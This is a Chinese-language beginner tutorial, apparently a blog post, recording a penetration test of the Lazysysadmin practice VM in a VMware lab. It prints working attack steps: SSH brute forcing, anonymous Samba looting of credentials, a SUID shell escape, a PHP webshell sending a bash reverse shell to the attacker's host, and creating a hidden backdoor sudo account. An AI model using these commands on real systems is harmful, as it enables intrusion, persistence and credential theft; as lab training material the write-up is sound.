Kali新手必看:Lazysysadmin靶机渗透实战全记录(附VMware配置技巧)
Kali新手实战从零攻破Lazysysadmin靶机与VMware避坑指南如果你刚接触Kali Linux和渗透测试面对一堆工具和概念感到无从下手那么这篇文章就是为你准备的。我不会讲那些空洞的理论而是带你亲手走一遍完整的渗透流程——从下载靶机到最终拿到系统权限每一步都有截图和命令就像我在旁边手把手教你一样。更重要的是我会重点分享在VMware中配置这类“老式”靶机时新手最容易踩的坑以及如何优雅地跳过去。我们设定的场景就是一个典型的家庭实验室一台运行Kali的攻击机一台运行Lazysysadmin靶机的虚拟机都在你的个人电脑上。目标很简单理解渗透测试的基本逻辑并成功完成一次实战。Lazysysadmin是一个经典的入门级渗透测试靶机它模拟了一个系统管理员比较“懒惰”、安全配置松懈的Linux服务器环境。里面包含了SSH弱口令、Web目录泄露、Samba匿名访问、WordPress漏洞等多个常见的安全问题非常适合新手用来串联知识点。而VMware作为最常用的虚拟化平台之一在导入这些靶机时网络配置、兼容性等问题常常会让初学者折腾半天。别担心我会把这些“暗礁”都标出来。1. 实验环境搭建不仅仅是“导入即可”很多教程会告诉你“下载OVA文件用VMware打开即可”。但实际操作中从这一步开始就可能遇到麻烦。我们先解决环境问题这是后续所有操作的基础。1.1 获取与导入Lazysysadmin靶机首先你需要获取靶机文件。由于原始下载链接可能失效建议从VulnHub这类知名漏洞平台搜索“Lazysysadmin”下载。下载完成后你通常会得到一个OVAOpen Virtualization Appliance格式的文件。在VMware Workstation或Player中点击“文件”-“打开”选择这个OVA文件。这时第一个坑可能就会出现注意如果导入时VMware提示“OVF规范不受支持”或类似错误通常是因为靶机版本较老与新版VMware存在兼容性问题。别慌这很少意味着文件损坏。一个可靠的解决方法是使用ovftool命令行工具进行转换。VMware官方提供了这个工具你可以先将其导入到较旧版本的VMware如15.x或者使用以下通用步骤创建一个新的虚拟机选择“稍后安装操作系统”客户机操作系统选择“Linux”版本选择“Ubuntu”Lazysysadmin基于Ubuntu。在虚拟机设置中删除自动创建的硬盘。选择“硬盘”-“添加”-“硬盘”-“使用现有虚拟磁盘”然后指向你下载的OVA文件解压后得到的.vmdk磁盘文件。这样就能绕过OVA导入的兼容性检查。导入成功后先不要启动靶机。1.2 关键的网络配置技巧这是新手最容易困惑也最影响后续渗透步骤的环节。我们的目标是让Kali攻击机和Lazysysadmin靶机在同一个网络内能够互相通信。推荐使用“NAT模式”而非“桥接模式”。很多教程默认用桥接但这要求你的主机网络环境简单比如直接连接家庭路由器如果主机使用公司网络或复杂Wi-Fi桥接可能导致IP冲突或无法获取IP。NAT模式让虚拟机构成一个独立的子网由VMware充当路由器稳定性更高。配置步骤在VMware的“编辑”菜单中打开“虚拟网络编辑器”。选择“VMnet8NAT模式”查看其子网地址例如192.168.233.0/24。记下这个网段。将Kali虚拟机和你刚导入的Lazysysadmin靶机虚拟机的网络适配器都设置为“NAT模式VMnet8”。确保靶机网卡已连接在靶机虚拟机设置中检查“网络适配器”是否勾选了“已连接”和“启动时连接”。有时导入的虚拟机这个选项是未勾选的会导致开机后没有网络。关闭防火墙仅限实验环境为了排除干扰建议在启动靶机前在虚拟机设置中暂时禁用其操作系统内的防火墙如果靶机镜像有的话。在实际生产环境中这当然是绝对禁止的。现在可以启动你的Kali Linux和Lazysysadmin靶机了。2. 信息收集找到你的目标渗透测试的第一步永远是信息收集就像侦察兵要先摸清敌情。我们的目标是找到靶机在虚拟网络中的IP地址。2.1 主机发现谁在我的网络上启动Kali打开终端。首先查看自己的IP确认网段ip addr show eth0 # 或使用更简洁的 ifconfig eth0假设Kali的IP是192.168.233.128那么我们的靶机很可能就在192.168.233.0/24这个网段内。接下来使用nmap进行存活主机扫描sudo nmap -sn 192.168.233.0/24-sn参数表示只进行Ping扫描主机发现不扫描端口速度很快。扫描结果会列出该网段内所有在线的主机IP和MAC地址。从列表中找出那个不是你Kali、也不是VMware其他服务如192.168.233.1是网关的陌生IP那很可能就是你的Lazysysadmin靶机。假设我们找到的是192.168.233.140。备选方案如果nmap -sn没有发现某些系统禁用了Ping响应可以使用ARP扫描工具netdiscover它在二层工作更底层sudo netdiscover -i eth0 -r 192.168.233.0/24这个工具会主动发送ARP请求能找出绝大多数开启的虚拟机。2.2 端口扫描与服务识别目标开了哪些门找到IP (192.168.233.140) 后下一步是扫描它开放了哪些端口以及这些端口上运行着什么服务。快速全端口扫描使用masscan速度极快。sudo masscan 192.168.233.140 -p 0-65535 --rate10000--rate10000指定每秒发送数据包的速率可以根据网络情况调整。这条命令会快速列出所有开放端口。更详细的扫描使用nmap进行深度服务识别和脚本扫描。sudo nmap -sV -sC -O -p- 192.168.233.140参数解释-sV: 探测服务版本。-sC: 使用默认的NSE脚本进行扫描能发现更多信息。-O: 尝试识别操作系统。-p-: 扫描所有65535个端口速度较慢但全面。扫描结果可能类似这样PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 3306/tcp open mysql MySQL 5.7.12从结果中我们立刻获得了宝贵信息靶机开放了SSH(22)、Web(80)、Samba(139,445)和MySQL(3306)服务。一个攻击面丰富的目标出现了。3. 漏洞利用多路并进的攻击尝试有了明确的服务列表我们就可以从多个可能的薄弱点进行尝试。渗透测试往往不是一条路走到底而是多线并行哪条路通就走哪条。3.1 SSH服务尝试暴力破解发现开放了22端口SSH这是远程管理通道。一个“懒惰”的管理员可能会设置弱密码。我们可以使用Metasploit框架进行爆破。启动Metasploit在终端输入msfconsole。搜索并加载SSH登录爆破模块search ssh_login use auxiliary/scanner/ssh/ssh_login设置模块参数show options # 查看需要设置的参数 set RHOSTS 192.168.233.140 # 设置目标IP set USERPASS_FILE /usr/share/wordlists/metasploit/unix_users.txt # 设置用户密码字典用户和密码相同 # 或者分别设置用户名字典和密码字典 # set USER_FILE /path/to/user.txt # set PASS_FILE /path/to/pass.txt set STOP_ON_SUCCESS true # 成功一个就停止运行攻击run如果运气好或者说管理员足够“懒”模块可能会爆破出有效的用户名和密码例如togie:password123。手动SSH连接验证ssh togie192.168.233.140输入爆破得到的密码如果成功登录执行id或groups命令查看用户权限。如果togie用户在sudo组里那几乎就等于拿到了root权限因为可以执行sudo su直接切换到root用户。3.2 Web服务目录、漏洞与内容分析80端口运行的Apache Web服务器是另一个巨大的攻击面。打开浏览器访问http://192.168.233.140。目录枚举网站根目录下可能隐藏着管理后台、配置文件、备份文件等。使用gobuster或dirb进行扫描。gobuster dir -u http://192.168.233.140 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html或者使用经典的dirbdirb http://192.168.233.140 /usr/share/wordlists/dirb/common.txt扫描结果可能会发现诸如/phpmyadmin/、/wordpress/、/admin/、/backup/、/info.php等有趣的路径。访问info.php如果存在它可能是一个探针页面泄露PHP配置、服务器路径等敏感信息。访问/phpmyadmin/这是MySQL数据库的Web管理界面。尝试默认账号如root/空密码或弱口令admin/admin。如果Lazysysadmin靶机存在此漏洞你可能直接进入数据库后台。分析/wordpress/这是一个WordPress站点。使用wpscan对其进行专项扫描wpscan --url http://192.168.233.140/wordpress --enumerate u,p --plugins-detection aggressive这条命令会枚举用户(u)、可用的插件(p)并进行积极的漏洞检测。它可能会发现存在漏洞的插件、主题或者通过用户枚举漏洞确认后台管理员用户名如admin。Web渗透的后续如果通过phpMyAdmin进入了数据库或者通过WPScan找到了WordPress后台的弱口令你就可以进一步操作比如修改WordPress主题文件插入Webshell。3.3 Samba服务匿名访问与信息泄露Samba139/445端口用于Linux/Unix和Windows之间的文件共享。配置不当的Samba服务允许匿名用户无需密码访问共享目录。使用smbclient查看可用的共享smbclient -L //192.168.233.140/ -N-L列出共享-N表示无密码登录。如果看到有可读写的共享比如share$尝试连接并浏览smbclient //192.168.233.140/share$ -N进入后可以使用ls、get等命令。在Lazysysadmin靶机中这个共享目录很可能直接映射了Web服务器的根目录。这意味着你可以通过Samba直接访问到网站的源代码、配置文件如WordPress的wp-config.php从配置文件中提取数据库凭证 如果你通过Samba获取了wp-config.php用文本编辑器打开寻找如下行define(DB_USER, wordpress_user); define(DB_PASSWORD, S3cur3Pssw0rd!);恭喜你拿到了WordPress数据库的用户名和密码。这个密码很可能被管理员重复用于其他服务比如SSH或者phpMyAdmin的root用户。4. 权限提升与后门植入巩固战果通过以上任何一种或几种组合的方式你应该已经能够以某种身份Web用户、数据库用户、系统普通用户进入系统。下一步是提升权限到root并留下一个持久的后门。4.1 权限提升路径利用sudo权限如果之前SSH爆破得到的用户如togie在sudo组直接sudo su输入当前用户密码即可成为root。利用SUID二进制文件在Linux中一些设置了SUID位的程序运行时可以临时拥有文件所有者的权限通常是root。查找这类文件find / -perm -us -type f 2/dev/null检查列表中的非常见程序如find、vim、bash、nmap旧版本等看是否有已知的提权方法。例如如果find有SUID位可以执行find . -exec /bin/bash -p \;来获取一个root shell。利用内核漏洞使用uname -a查看系统内核版本然后搜索该版本是否存在公开的本地提权漏洞如DirtyCow。在Kali上可以使用searchsploit工具进行搜索。4.2 植入Webshell维持访问假设你通过Web漏洞如修改了WordPress的404页面模板植入了一句话木马并使用中国菜刀或蚁剑这类工具连接成功获得了Webshell。但这通常是一个低权限的shellwww-data用户。从Webshell反弹一个更稳定的Shell 在Kali上监听一个端口nc -lvnp 4444在Webshell中假设是PHP执行反弹命令?php system(bash -c bash -i /dev/tcp/192.168.233.128/4444 01); ?将192.168.233.128替换为你的Kali IP。如果成功你会在Kali的nc终端看到一个来自靶机的shell。创建后门账户获得root权限后可以创建一个隐藏的、具有sudo权限的用户。useradd -r -m -s /bin/bash -G sudo backdooruser passwd backdooruser # 设置一个强密码或者更隐蔽地在/etc/passwd中直接添加一个UID为0root的用户。4.3 清理痕迹与报告在真实的渗透测试中获得权限后需要清理日志避免被管理员发现。但在练习靶机中这一步可以跳过专注于学习过程。整个渗透流程走下来你会发现Lazysysadmin靶机就像一本精心设计的教科书它把多个独立但关联的漏洞串联在一起弱口令导致SSH沦陷Samba匿名共享泄露Web配置Web配置中的密码又可用于登录phpMyAdmin或WordPress后台最终通过文件上传或模板编辑获得Webshell。这个过程完美诠释了“攻击链”的概念。最后关于VMware的配置我自己的经验是对于这些老靶机单独为它们创建一个“自定义仅主机模式”的虚拟网络让Kali和靶机都连到这个网络往往比NAT更少遇到奇怪的网络问题。另外记得定期为虚拟机创建快照尤其是在进行破坏性操作之前这样一旦玩坏了可以瞬间恢复到干净状态。渗透测试的学习就是不断尝试、失败、再尝试的过程这个靶机只是一个开始但它为你搭建了一个非常扎实的认知框架。

相关新闻

云容笔谈·东方红颜影像生成系统.NET框架调用示例:使用C#开发Windows桌面生成工具

云容笔谈·东方红颜影像生成系统.NET框架调用示例:使用C#开发Windows桌面生成工具

云容笔谈东方红颜影像生成系统.NET框架调用示例:使用C#开发Windows桌面生成工具 你是不是也遇到过这样的场景?在网上看到了一个很酷的AI图像生成模型,想把它集成到自己的桌面应用里,但一看API文档,全是Python的例子&a…

2026/6/22 6:08:06 阅读更多 →
手把手教你用bert-base-chinese:从环境配置到三大功能演示

手把手教你用bert-base-chinese:从环境配置到三大功能演示

手把手教你用bert-base-chinese:从环境配置到三大功能演示 你是不是经常听说BERT模型很厉害,但一看到那些复杂的配置和代码就头疼?别担心,今天我就带你从零开始,一步步搞定这个经典的中文预训练模型。咱们不聊那些深奥…

2026/6/22 6:19:22 阅读更多 →
Neeshck-Z-lmage_LYX_v2效果展示:高分辨率人像生成与电影级光影对比

Neeshck-Z-lmage_LYX_v2效果展示:高分辨率人像生成与电影级光影对比

Neeshck-Z-lmage_LYX_v2效果展示:高分辨率人像生成与电影级光影对比 今天我们来聊聊一个非常有意思的国产AI绘画工具——Neeshck-Z-lmage_LYX_v2。如果你对AI绘画感兴趣,特别是想体验一下国产模型的能力,同时又希望操作简单、效果惊艳&#…

2026/6/22 8:57:55 阅读更多 →

最新新闻

5个核心功能全面解析:LSLib工具包助你轻松处理神界原罪与博德之门3游戏文件

5个核心功能全面解析:LSLib工具包助你轻松处理神界原罪与博德之门3游戏文件

5个核心功能全面解析:LSLib工具包助你轻松处理神界原罪与博德之门3游戏文件 【免费下载链接】lslib Tools for manipulating Divinity Original Sin and Baldurs Gate 3 files 项目地址: https://gitcode.com/gh_mirrors/ls/lslib LSLib是一个强大的开源工具…

2026/7/5 5:27:40 阅读更多 →
终极Koodo Reader故障排除指南:15个常见问题快速解决方案

终极Koodo Reader故障排除指南:15个常见问题快速解决方案

终极Koodo Reader故障排除指南:15个常见问题快速解决方案 【免费下载链接】koodo-reader A modern ebook manager and reader with sync and backup capacities for Windows, macOS, Linux, Android, iOS and Web 项目地址: https://gitcode.com/GitHub_Trending/…

2026/7/5 5:25:40 阅读更多 →
3步搭建个人哔咔漫画离线图书馆:告别网络卡顿,下载速度提升300%

3步搭建个人哔咔漫画离线图书馆:告别网络卡顿,下载速度提升300%

3步搭建个人哔咔漫画离线图书馆:告别网络卡顿,下载速度提升300% 【免费下载链接】picacomic-downloader 哔咔漫画 picacomic pica漫画 bika漫画 PicACG 多线程下载器,带图形界面 带收藏夹,已打包exe 下载速度飞快 项目地址: htt…

2026/7/5 5:21:40 阅读更多 →
MySQL数据视图学习笔记

MySQL数据视图学习笔记

1. 什么是视图?视图是数据库的虚拟表,不存储真实数据,仅保存一条预编译的SELECT查询语句。每次查询视图时,数据库会动态执行这条SQL,从关联的底层数据表中实时计算并返回结果。视图相当于给底层数据表开了一扇“观景窗…

2026/7/5 5:19:36 阅读更多 →
DDrawCompat完整指南:如何让经典Windows游戏在现代系统上流畅运行

DDrawCompat完整指南:如何让经典Windows游戏在现代系统上流畅运行

DDrawCompat完整指南:如何让经典Windows游戏在现代系统上流畅运行 【免费下载链接】DDrawCompat DirectDraw and Direct3D 1-7 compatibility, performance and visual enhancements for Windows Vista, 7, 8, 10 and 11 项目地址: https://gitcode.com/gh_mirror…

2026/7/5 5:19:36 阅读更多 →
MyBatis是什么?MyBatis-Plus是什么?

MyBatis是什么?MyBatis-Plus是什么?

MyBatis是什么?一款 持久层 框架持久层是什么?软件分层架构中,负责实现数据持久化、专门与数据库交互的层级框架是什么?一套封装了底层通用逻辑、提供统一开发规范的半成品程序(开发人员在这套半成品程序上继续开发自己…

2026/7/5 5:17:36 阅读更多 →

日新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/5 0:03:34 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/5 0:03:34 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/5 0:07:38 阅读更多 →

周新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/5 0:03:34 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/5 0:03:34 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/5 0:07:38 阅读更多 →

月新闻